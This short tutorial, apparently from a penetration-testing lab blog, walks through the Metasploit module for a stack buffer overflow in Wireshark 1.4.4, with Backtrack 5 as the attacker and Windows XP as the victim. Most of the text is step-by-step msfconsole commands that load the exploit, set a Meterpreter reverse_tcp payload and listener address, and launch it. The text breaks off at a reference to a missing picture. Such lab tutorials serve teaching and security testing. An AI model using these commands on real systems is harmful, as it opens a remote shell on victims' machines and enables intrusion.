This module exploits a stack buffer overflow in Wireshark <= 1.4.4 by sending a malicious packet.
Exploit Targets
Wireshark 1.4.4
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/multi/misc/wireshark_packet_dect
Msf exploit (wireshark_packet_dect)>set payload windows/meterpreter/reverse_tcp
Msf exploit (wireshark_packet_dect)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (wireshark_packet_dect)>exploit
Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool like the picture below.